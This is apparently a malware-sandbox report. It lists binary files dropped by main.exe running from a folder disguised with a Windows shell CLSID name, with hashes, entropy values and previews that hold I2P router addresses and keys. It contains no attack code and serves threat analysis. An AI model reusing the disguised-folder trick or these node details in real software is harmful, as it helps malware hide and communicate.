Preview:l.Oo.g.|..t..a.x...@...y.f.I.\Gl4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.a>..@&.K4*...\.&.q.....................................NTCP2.v.host=.24.70.217.209;.i=.ZUql9fMaOgSH320ByI4jwg==;.port=.15318;.s=,XNO6Agv3Vr1I~OfE4twr1HfJNL7vNPqlPF-rWQrv2RE=;.v=.2;..........NTCP2.@.caps=.6;.s=,XNO6Agv3Vr1I~OfE4twr1HfJNL7vNPqlPF-rWQrv2RE=;.v=.2;..........SSU2...caps=.BC;.host=.24.70.217.209;.i=,WFd0sKoQQCnJhEiRYWwBrYlaTS2bWsSZWNH40~aM~e8=;.port=.15318;.s=,VrSCUqtreY3EPYg~7hotq5IfXNsQsqBgxDLjMVV1Who=;.v=.2;..........SSU2...caps=.6;.i=,WFd0sKoQQCnJhEiRYWwBrYlaTS2bWsSZWNH40~aM~e8=;.iexp0=.1726480601;.iexp1=.1726480614;.iexp2=.1726480634;.ih0=,Ijovj6ZyBBHfPdzIqnQ~FcQReznm4wdilJ2jWugnf4U=;.ih1=,ImQCa~41bzppySTUmrtpGpJekB4e5o9r
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):813
Entropy (8bit):6.705097401916861
Encrypted:false
SSDEEP:12:h+9AHm7Hm7Hm7Hm7Hm7Hm7Hm7Hm7Hm7Hm/9dfhfMLCNqzwp8oeDQACLqCtjn:KyyyyyyyyyFdpULCQzwLMQD1R
MD5:60B96FED011F8B025F1899BDC6E4CE39
SHA1:9FB5595D776880798E6D8A4ED1AC09160A06138A
SHA-256:A43D034E20E3CED078115E0E1A4707760EDF3E0601698831F77D1F39F4E0038F
SHA-512:C5DBD592DEC741F59A6B917E80714ED4DCA1C78AF855373613BADC8E9B1A30BED437DF3CB20DB21660849AACE85C6172A5E3024131782B1352B8C19B818269F9
Malicious:false
Preview:Hi..Rz.tiz+f........u.=._.........0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'...1...c. ....[..;.......;Ja..................!;...........NTCP2.w.host=.47.250.187.161;.i=.oQpvr-SpcZmgbEyWfipV5Q==;.port=.27292;.s=,VsE-CucwCWb3WN2Tnb6a8JYL7B7tpQCJZyym0noytnY=;.v=.2;..........SSU2...caps=.BC;.host=.47.250.187.161;.i=,Yxx6C4wBBV710j3U~fEjX0vy11irWDab1UDJQvgXqog=;.port=.27292;.s=,ZnUo7CsfJvDAYnuedGGhgRID0OhaFEqjuPPdURp81WA=;.v=.2;..-.caps=.LRE;.netId=.2;.router.version=.0.9.63;..h....v7=......%4...4n7......o.........L+.M.eKt..Y.\......
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):808
Entropy (8bit):6.618602774558439
Encrypted:false
SSDEEP:12:sk8nJJJJJJJJJcz8yfgeaiFsUJHzjuj8VYz/K:FD8yfgczqwVe/K
MD5:13FFF422601D369AFEED5DA495E62C52
SHA1:398A32E5F1CA0B1EC12BBA814FA33A525BF2F429
SHA-256:FC9415C2EC28AFEB16BEF8C3DCA3EE3137EA143984530ABCAEAF75A8CD37EF6F
SHA-512:CE66050A7B25A45DF04B052B3D8EE4B41B2563BFA047E496C32DC9AA73AA0601A1A366403A85EC92410D97DC5EF5622C1F4FA3DAC1097709708BFE12A20A9435
Malicious:false
Preview:..B......:p......i....,8.G........P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G....~9...VE.mm..Bm:...5o..LU..~..........................SSU2...caps=.BC;.host=.92.95.33.134;.i=,PF92~R9-d47rxbszpg9wuAaTGXHh~Z1Q8ynKl40W2vo=;.port=.38552;.s=,Iruqpd4WqAb3D~9ak5cI48n0ixl1k1B6j5lm45252C8=;.v=.2;..........NTCP2.u.host=.92.95.33.134;.i=.YhUz0XXiYyaVUUFJJNq4qw==;.port=.38552;.s=,8S15DBkB9jBc5Vu6kGe3EyO5YFVFafFYNYW4JODZ7wU=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.63;..B....y..W..Y<..V..-.....w.$..q..z.....B........@.~..;..e...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):988
Entropy (8bit):6.633110337562871
Encrypted:false
SSDEEP:24:/CRRRRRRRRRMkkYaLXf8eYgqXPub6+E8aXM:/3DXf8epq2+oAM
MD5:32471EDCA6D92DDA2698A3D14D672064
SHA1:3516539ABEA3293A1D8A54FCE217B49C46812738
SHA-256:077B16227E723B6806C37F8FCB7405685D1D64B761E33E2FCAD9B1C4CFEB0006
SHA-512:A86B41EBC10EFA17A6EFFA213EFA3CCDEDFA702235012338BEECC7E68AA2584D0D002DD5A488F58BD6A239A85BA248C9972A9D63B509E98882C89488D655FE7C
Malicious:false
Preview:.....*q.B.f1.'...OJ..T.{..]r...6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5...._..")..n...1.u.x..q.n.0.=Q..N..........................NTCP2.@.caps=.4;.s=,IAyA~7yXHz91KqnHjzsMYUpsqR8wcww3VDIGh02rqxg=;.v=.2;..........SSU2.|.caps=.4;.i=,5wWPICrp-yX7AC~Quo~izVRWzEZzJgAYsmp774m20VQ=;.iexp0=.1726477015;.iexp1=.1726477673;.iexp2=.1726479338;.ih0=,X9HFLg4WWC6prjzNKrp22BKdk6bNZNkML8PyMBYLIyg=;.ih1=,GIEXCb9OkV3aTUpTW1GKBMR5M0uY73Yffw5zi4IE9~A=;.ih2=,nJ-x~yftl3KzDbBCpv~gwLrea0yiES73fW3qdxch~7I=;.itag0=.2134427794;.itag1=.3081442362;.itag2=.2781506574;.s=,UhF1NcSuopTCBttHHxsJhkhTR6ahx1iIEktLk-VZD28=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;...X.O.A>....\A.X0.4...ru..s2D..D|.JkDQ...40?....._.K|.?..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1410
Entropy (8bit):6.710701090330378
Encrypted:false
SSDEEP:24:A599999999VamLi4er6cuLPer6Y4LOgCo9OC4LOgConRy4PJR2xdQR:Az8BXL4UE4Uq9sdI
MD5:27DAA454EA4225E45486D0B833A6BE1B
SHA1:302B6521964A72D725B8C8D22E3B97AE8EB4314D
SHA-256:10E6FA8A43949783F84974CB461008B0F115E767D5CF6FA128A9332C1A47A07B
SHA-512:17C51F8BB52B04243FDF9DC555A25D3C069D6760A7DCEC1B1D47765E1D7062B85BDDAB9351814EFD63542CC76178B4AD2A9D48C1F1BA151FF433D6DCFF46880C
Malicious:false
Preview:.. B.c.N.0....ZGrl.#....I..u...c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X..ik6..O.v.D}.c..../\.....d./.........................SSU2...caps=.B;.host=.2001:470:b5ca:0:0:0:1:2;.i=,7EFgK4864CEcE0mRtRbziSmvZoSC5zACcjUYCeRlZOc=;.mtu=.1420;.port=.25314;.s=,ys5DF5SZKRj06wDZnk7nxJRJpMThhGYMWcKsw-SJ4hw=;.v=.2;..........SSU2...caps=.B;.host=.88.210.6.42;.i=,7EFgK4864CEcE0mRtRbziSmvZoSC5zACcjUYCeRlZOc=;.port=.25314;.s=,ys5DF5SZKRj06wDZnk7nxJRJpMThhGYMWcKsw-SJ4hw=;.v=.2;..........NTCP2...host=.2001:470:b5ca:0:0:0:1:2;.i=.SYZdmId6kKGi~3thK62xHw==;.port=.25314;.s=,T9jNNBJ58G20f1rU7LIeNHCnWxDFjXn8~S1~nKI2iDQ=;.v=.2;..........NTCP2.t.host=.88.210.6.42;.i=.SYZdmId6kKGi~3thK62xHw==;.port=.25314;.s=,T9jNNBJ58G20f1rU7LIeNHCnWxDF
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):867
Entropy (8bit):7.3429915190375485
Encrypted:false
SSDEEP:24:5r5QQiOW6iWq8mAHNhqbv9a/hjYFsEJT6LgIT1EDscKAu9a:N52arqChqc/hjY76s4cLu9a
MD5:98FF7EED5D3FEFF8505B49A9AE82A89C
SHA1:3C12A161294673EB7D203B523AE394362978DDA1
SHA-256:D339CF29FD0C744325B709093E9F7C6A2CC6536EEDFC54FF8FF46885B31DC1CB
SHA-512:299B85435C4BBB453543C5C2055995E639796873EF464AABAA9D9CF45354F0D2E18CDF38858D492D30BB8EAC0BEE4D5FF3D0CB753F5DDADFD11A9D8C353D9AC4
Malicious:false
Preview:..`.A.+p .O/..c....&/.(t..5g/......E..D.....g.."`...I..(..3>e|.'.yf...T....Rc...B..P...c$..Pc...M..%.Y>B...n|.].H..V.#p]..;.X......lMy....q..,.A..p.QZ..H.....OD....h.86c.n.......}.v/...Si....S..D...H..._Y...~.g..Yn.....8X>.P....R......J.O..r.....T=.ZED.$.....'y1tE|.N.....N.;h/..2?.#S.I4=...dX..(.<..bN.......pc..{.....y..r(}..q.4......8..K.>".J....J..%...z'..............c...........SSU2...caps=.B;.host=.207.178.119.175;.i=,93D7P-3uYzcOAchvE9L-BkG7sfrhOLY-JAF9ebnze3k=;.port=.29260;.s=,zRqCNdC28r45dm5hss1PLgwV4SanW0u7j-zM7LSPT3Q=;.v=.2;..........NTCP2.x.host=.207.178.119.175;.i=.AQQR9XzwZfWscEtM8qdk~g==;.port=.29260;.s=,~dDAdwubX6dqaU25pVUFCQbC-xzWbqIVv5o9afYr8E8=;.v=.2;..b.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.522;.netdb.knownRouters=.5742;.router.version=.0.9.63;,...0.........@........Z...C..A.. .e..'TP....n...?.[.x....\U.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):752
Entropy (8bit):7.435572493757363
Encrypted:false
SSDEEP:12:QcJoVRj86/OKne5b4yLaxoE3T6DoOxyLHZLBZalmghuxyLqTFbUisM5PbkP:TiVFOGmb4yWxoSmkOG5FZaZsGqTFbUJb
MD5:90BDD109A4C4BA22E4F319BB26876EE4
SHA1:A528C8C4BD31A3131EF70CCA05E505D5D6DB782F
SHA-256:3E7AB6F3E7BB422E58D5306EA6980BDAEE20B2F68718AD881FA91AEA3F1A92BC
SHA-512:6AA866234FB56132B4D437A203B10A0D8EFC5B42A4920D0EA40BC043867435BFD7EF8D9AB217E7C7BD4EED596F3587473427F6CBC45AB52D855429953E7219F9
Malicious:false
Preview:..+T...1$P..R!Jv9ekng....Z..5..&....D..C.g<.J...U.y.?.6.q!.....I...+.P.T........c......n..."$]....P..X..?.}.2.<.1.?...I...[..8;P$.0._.e....^....1.S...D+-..N....$Q.<..J05@..y..@H..3....oku..Y..7...d...U..r.5..j.pv.o.u..........P.XG......]....$.}.~"o{.....O.Am../ER.P.a......).....!.V.,H...aj.8f...|..qj....,.-....]...*.@.<...Q..._o.,..A.N....8\....O..U...E..N..7P................................NTCP2.t.host=.79.36.34.44;.i=.D9MW-eU2vSM8QMoXIJwphw==;.port=.26576;.s=,0wSf0bLK-3UFSzSW79xE0-VvMYWwd9xy7BvL2wGNKzA=;.v=.2;..........SSU.].caps=.BC;.host=.79.36.34.44;.key=,t1QmZ~9QLYVq54Ob-vkmLJlHqcE0qePvWFv5snAy96U=;.port=.26576;..,.caps=.LR;.netId=.2;.router.version=.0.9.48;)... cn:QQ.&...I....y.a@...g.a.....>....p.I..O...V~.3..R7U....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1296
Entropy (8bit):6.655642820325174
Encrypted:false
SSDEEP:24:wjY6/e/e/e/e/e/e/e/e/e/wIylbim87KHgemH7K9Cm/ql+:H4iHewKt
MD5:EF9D8E387F2DAD8AF9D38E86B74EDE49
SHA1:C2E3912420810DEFAAE03841EC5895683A0C7A9E
SHA-256:EEB030B521A32AEDF1D65DCB73CDE1CB6CE94B3CD95DE0FF6B729BB32097BD1C
SHA-512:5B8EF2E0140856F45DA62D99EB560FF351B5664AB4BB7C157139B31354ED6E036B3BCEAC8174648E81CF66A10F47E269866808922551DCA89AADABD4061DB7E7
Malicious:false
Preview:...i....u....Y(eG...!t.X.&.8n,..l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f..... .c..V..U..ey.4.....t..).Jj..............................NTCP2.u.host=.85.239.53.47;.i=.RIVGkh3MZqu~jAnj-Etv7A==;.port=.28583;.s=,UXiZtxDPm6YzGAKIPlSDGToiNHs8LBuhekRUlNoKaTI=;.v=.2;..........NTCP2...host=.2a10:1fc0:6::81c4:78e7;.i=.RIVGkh3MZqu~jAnj-Etv7A==;.port=.28583;.s=,UXiZtxDPm6YzGAKIPlSDGToiNHs8LBuhekRUlNoKaTI=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.53.47;.i=,8CdrtN4xnFO4NeHH32ZTciCf8XQrQXMoLr~DHkfUjVU=;.port=.28583;.s=,aBPP88pRdS3hrM1-weaez3R4er1OzpjUQtk4SY1VJzc=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:6::81c4:78e7;.i=,8CdrtN4xnFO4NeHH32ZTciCf8XQrQXMoLr~DHkfUjVU=;.mtu=.1500;.port=.28583;.s=,aBPP88pRdS3hrM1-weaez3R4er
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1250
Entropy (8bit):6.719354937553381
Encrypted:false
SSDEEP:12:c6vtQGGGGGGGGGIJZya30IXdc30IX94X9gSMJe5Uth4mNaU/WDRw3E41rsAyVXa7:52ZjcqmRJeHoWuUoHyYm/kGym+3vg+VB
MD5:1C55E8F8C0CF5F40932A0A5E123D7950
SHA1:2B8E590BFA163C92AD9CD88DD6351C1F7A616D51
SHA-256:D8602CE05C4B1BF36F8B9621C8A71899141A258A6E56880171F02F80B96873C9
SHA-512:985E88B0D928B6C6A943A38184CF4D95FD9D2D528859B34D3FD5BB04D3613C682CDDE295D89D653C9CA41749E27C7560CA745136998C1A91343496331B0E4225
Malicious:false
Preview:{._G*....'....(%..._.{...(..S(.K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n.`.=.p..>.q.l4...L/?.I....................@............NTCP2.@.caps=.4;.s=,gkySiDzPCt-U5KHwT8o7jD9Hz~AcG0k5WFTzeKGtPkw=;.v=.2;..........NTCP2.@.caps=.6;.s=,gkySiDzPCt-U5KHwT8o7jD9Hz~AcG0k5WFTzeKGtPkw=;.v=.2;..........SSU2.|.caps=.4;.i=,cuBDhbS7~cxNNoi~00PWtVh9SSymUQN2LO4pleubWpk=;.iexp0=.1726478698;.iexp1=.1726478698;.iexp2=.1726478698;.ih0=,6D3~2RiWXlayHWUm~GTaI2YyqAkCmC3LBnRwJ~kUMME=;.ih1=,SpvwbPM5c2GAKg5qplOg7KwA0RFu5QAxIsFRiqz3Amg=;.ih2=,9WtkDax6dCaFddiXsln9VDxIq-dR-1vfOqctU48l9Z4=;.itag0=.1738221619;.itag1=.3308870456;.itag2=.3524311204;.s=,Pk1Ate9i2H3NZ15sqDyQLGwCSb6uV7KtSW1TKPir-w8=;.v=.2;..........SSU2.q.caps=.6;.i=,cuBDhbS7~cxNN
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):988
Entropy (8bit):7.206526544467207
Encrypted:false
SSDEEP:24:1riQz4YVyAwlsNEfShCB2CtOGP8QbRzsj:xYAwlsNkShVv
MD5:8ECBF6356B36F8029AD6B74D79F53532
SHA1:CC3517F6895EEE8B6DFDE1ED551BA01319B7C41E
SHA-256:6EB165FAE619E27CE3B2B1CDF89C25A0D2698CACDF8CF6616C8714AAFD5D703F
SHA-512:482DF9F359C16D98FC2EC2BD5E0819686C2889C6616066650018781178773038DBAAD6E5656E9A03F316BA1160A6157CE797A1635016D826A0F7B1464CA2C94E
Malicious:false
Preview:".C..................61n.6.X&.(..u.._~..^"...ZX.|.&.......Y.a.........?-....f=m.*...P..YWE...0o.n..s-.Y...d..1..I.&.dM\.>~.h..0....?%....E..~.G..0!i...\S.....c..~hYXD........Eu.8.._.2.jf.5.2d....i}Q..Km.y+F}.../.4..e,..0.......@...q..x(..D......g4N..+..xj...@%..069o...!....! L..pv..b...x..y...l_.E....{I4iU.o.).l...T..1..G0......c}.eW(....2`.;....t"P=.V....2'...........................NTCP2.@.caps=.4;.s=,bCOb5nW5J0MUahpr7misIdxvl-OoOx1s70jNJKl9xmA=;.v=.2;..........SSU2.|.caps=.4;.i=,m1-2XHORsBArkzvhoHMlTpeGS3VE22-s7yHafWoBMlg=;.iexp0=.1726476333;.iexp1=.1726476197;.iexp2=.1726477903;.ih0=,-e0SW5rDvxh2vRCfJNNAUGBy8gYaS-s8Sxze7uFHjkE=;.ih1=,FabXTz-PtSwabxcpI9FcLU6BJSFzV7x6CkkwvLGS9mQ=;.ih2=,Nx141QqTrR6yjU6DWq5avu-uWV-OPTIz1KiS-oAo1V4=;.itag0=.2975717577;.itag1=.2756262787;.itag2=.2847385431;.s=,WT2D1grl4Uk~b1M~9i3VxXc-sZaajQLOHgWNgkc-6Wc=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;WpD..pe'.Am.h..d.?.....0N8'.rB...,8,...h..do...M...jp.i8.{....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):1075
Entropy (8bit):6.706873012309314
Encrypted:false
SSDEEP:24:w/guuuuuuuuuQWGoE4i464IXshkttNitt7s3yf4OiI:EWL5DftGtQ3MpiI
MD5:9D603547A2DA47F0E34291FB491D0F4C
SHA1:8C14D90F698050E564A106577EF4D39A96A717FB
SHA-256:84E8E0A52C0214712FDC3222197706867D1D4C23251804C5EB519373AB5A968D
SHA-512:7E4553D1E939D3B21A7F77568E6398D5B4EAAB14CA12AE210763834BA48840C99A8B89A6F72CC4EAAD925CFA12A4DAF869CF23E1DCBFE1B378BAB58561AB6942
Malicious:false
Preview:...GDy....d....e....8.D7....Np...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$......ZF.T'..p{.P=....)._&:....`K............................NTCP2.w.host=.70.113.162.253;.i=.Qcq7tjS5pICwUH-XahWrlA==;.port=.14928;.s=,fY4KYVyWRfsP-u3mboHoflmGRUgP9m09RoXAXkmHHjk=;.v=.2;..........NTCP2.@.caps=.6;.s=,fY4KYVyWRfsP-u3mboHoflmGRUgP9m09RoXAXkmHHjk=;.v=.2;..........SSU2...caps=.BC;.host=.70.113.162.253;.i=,K4~pQ9NVeeIvMI8UAn97jfNgf3-YftHjhKU1ktDKV3g=;.port=.14928;.s=,4vubEkwgUrsULLRW5Xi0~zOhKnt0WIUAMsi~FH1~AUw=;.v=.2;..........SSU2.q.caps=.6;.i=,K4~pQ9NVeeIvMI8UAn97jfNgf3-YftHjhKU1ktDKV3g=;.s=,4vubEkwgUrsULLRW5Xi0~zOhKnt0WIUAMsi~FH1~AUw=;.v=.2;..a.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.8;.netdb.knownRouters=.16946;.router.versi
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1558
Entropy (8bit):6.596042142290713
Encrypted:false
SSDEEP:24:fxebxWIWvAtqbzOzT4H/VWTNnR8lg7Q7T4qQ/qyX1uQDM44g75:ZeNfIAtQzOT4f+B7Q7T4GyF5
MD5:422DBF076603C970D188FB6CFF224CD6
SHA1:4A05A6A47670D9FB3B31F599884205C7CB224B91
SHA-256:BAF491C7C3E9903EEF0F02707E4381CBF94D5E0EAF92978637C978132F57FF47
SHA-512:D609C45FC7128228D353119271324722EF4D49F66E1D667FAB482D697EE617E5138D8A90E98C92A0B2ABFC0B9820DFFD888132EA264F3CFD0D3074CDAB37ADA5
Malicious:false
Preview:1C.2-3.....N.E.\...7"(~..,.D.qnv~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U?.1..A,h.`....(.6./."..N.<.>..Z..............P...........NTCP2.@.caps=.4;.s=,HSyCMa4t-OZ8SkfyLJjYZV3pr9amEOSRATlOwY2UrGQ=;.v=.2;..........NTCP2.@.caps=.6;.s=,HSyCMa4t-OZ8SkfyLJjYZV3pr9amEOSRATlOwY2UrGQ=;.v=.2;..........SSU2...caps=.4;.i=,A3a6Cw20EAjttLJYZt03SpC-b8swtC-HfE2ssRJasSY=;.iexp0=.1726474110;.iexp1=.1726475384;.iexp2=.1726474412;.iexp3=.1726477698;.ih0=,vFMVAbeozKm~4bwUa~M39qpa5TKnOT3DqbUVpNyTlGo=;.ih1=,umLaz2jg8xrAm5znU1w4R8DmZbVrtu7MD8f~iRDSkB0=;.ih2=,AwKAc2d1mur1hziBN9y~c~A4hScNyCgiCmbJVgZdZjY=;.ih3=,b~BmfFnXJkyoDdSvrkVdJoy9em3HZ-~PdStXYQwxvhU=;.itag0=.704858649;.itag1=.643458066;.itag2=.29109614;.itag3=.1220873247;.s=,HTwVTqQm
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):815
Entropy (8bit):7.300877615207222
Encrypted:false
SSDEEP:12:ZhvDZU60/Ewbcfegl36aIsouq604YqFZRPBiXQ4QuNmtGgoTiGub8Sjn:H1UEwboTlMwYqFfcHQuNmYTiH8s
MD5:DCC2897F55173F852A287FC8F3DE9702
SHA1:F5B3F78EDF142E3D6BFD411F91CD0D5A98ED2F9D
SHA-256:92FFF27133048E4ADEF195E9FA41C7BD230931CEB7960F0BFC553730A630EC0C
SHA-512:DA448C1D836AFA2B512FE84C072C547AA75EE97DC85F702C46EEEA73B7E30032E66B8DAD41FBE73B9BDE834B00D528B0882FB685DB37B3E7A40C1860AE255731
Malicious:false
Preview:..gU..0..H..FVD.....]H.3.....MiCv.....,.Q...Ua.8...U.X9Z5...?..B&Lp.Q[...1E.SGY.....le*.[.k...90I.i...T...dD..xg.p..$..f...h.m3.r~y.N.Sn...J.#.....jd(.........N...wK'....Ps..X.\;..w......m.N....9..)...@.w..wY.....o<..Q.D...Q.c~..yEb...yAh..9r...~xd6L^....vnp.d.P...p..A(.......JzH`.............}./...wX....^Eh5..."...\,CGF.K......\,>!.1(S`F.....~k......8.j.]...............~...........NTCP2.x.host=.108.227.133.164;.i=.gxQLOXE9yXGYs4urwZAT1Q==;.port=.21344;.s=,zwUPT00e-SV1~oIC5icgOq~JxiytQ5Qz2C-7prW1oEc=;.v=.2;..........SSU2...caps=.BC;.host=.108.227.133.164;.i=,SP1XQ042C-68FyQIQXoJ7DEF3VeXI5Zq2fxVd2qiqhs=;.port=.21344;.s=,gH6SR2oBSwUXk3XdIjnPUTy~klGYwkj7th1beF~kBkg=;.v=.2;..-.caps=.ORD;.netId=.2;.router.version=.0.9.63;.:\......g...Ol..e..:.b(X.]...H.}(D.E.gU.=I#..Fo/)L.+2.A...3.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):808
Entropy (8bit):6.695842382334072
Encrypted:false
SSDEEP:24:TKzQ6cG6cG6cG6cG6cG6cG6cG6cG6cLxwUZED/xYV9wpZtDzkm:qQ22222222VbGDaybtvd
MD5:C6B3811FF57198EE2EB2D379772B8FD2
SHA1:0FEBE86697C715F6EA3B79FE32DA93CB358304EE
SHA-256:2ACC5501AC3849B52CAE9C63F76818321EADBCF88FECDF5836CAFC47C8F9DADB
SHA-512:80E9B1DDA6FB55B0744D545BCAE6B2E75B5CD02E7C011DD0BEF9A6B6F6093CD7792B5F301D0B1DB34999899D222A1CED460596F1CAB258B60498A6DAB87EEBCB
Malicious:false
Preview:...hx...2>.....s8...A..Wh.sh....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....`.I#....C.S.S.*.+.&d..=.....a.E...........$.g............SSU2...caps=.BC;.host=.99.234.18.44;.i=,xOQX~HxIOmjdERdqgaCxBs5vQLa0TW5KK0c2kSWbPpA=;.port=.23154;.s=,U1wZwJNxli4HWKFJTASaQTFmknVDChkMvMNwRPSsGCA=;.v=.2;..........NTCP2.u.host=.99.234.18.44;.i=.goYcMyuaZmu8UnRhCtCl0g==;.port=.23154;.s=,2sOpaWxnkyadFJJemuj9s3vKKsIn7Te9hYFH1oHdUGk=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;d..wky..M..R...W...#:..y.N..i.i.u..~...+.W...Gh"H.....vx..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):944
Entropy (8bit):6.617166471162901
Encrypted:false
SSDEEP:24:UZxPPPPPPPPPj7AQmc9IwbRZeWfdwbYZeaNt:AVkQmUPZ1Zzt
MD5:8F0BDC2375F36ED0595876DE3BA6BA13
SHA1:7CFC16B043304868A3638684D41E67A6BF46C032
SHA-256:1F233E776B2F4B75E414FF88FA1B55D6793F77BC85E46169DA348579959DB1FD
SHA-512:27F9664338290F36FE333624A77025CF75AE46746BC3743E73C7976B72578163603A647C9F9CA2715B26B06E19A482916782963E6365DA33551D7EC3D6C4997F
Malicious:false
Preview:.6O.RP.....c.{..V-..p.0.@,u*....FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.)...N.~-D!..6I...`M..W.2..k..............$.-............NTCP2.A.caps=.46;.s=,Sokk5jRBeASWxvAAc-WNE5MFOuMRqvQYpzyBfgOOWVc=;.v=.2;..........SSU2...caps=.BC;.host=.24.231.176.11;.i=,JnRqug65DTcqY~ohqfDnq39X1D6iHQXlOY4v6ljWGhk=;.port=.22951;.s=,3nO9wEy6I7creLY7JfW4B0D8A3q-pI9bCEeIfeniGCA=;.v=.2;..........SSU2...caps=.BC;.host=.2600:6c48:457f:82ff::d73;.i=,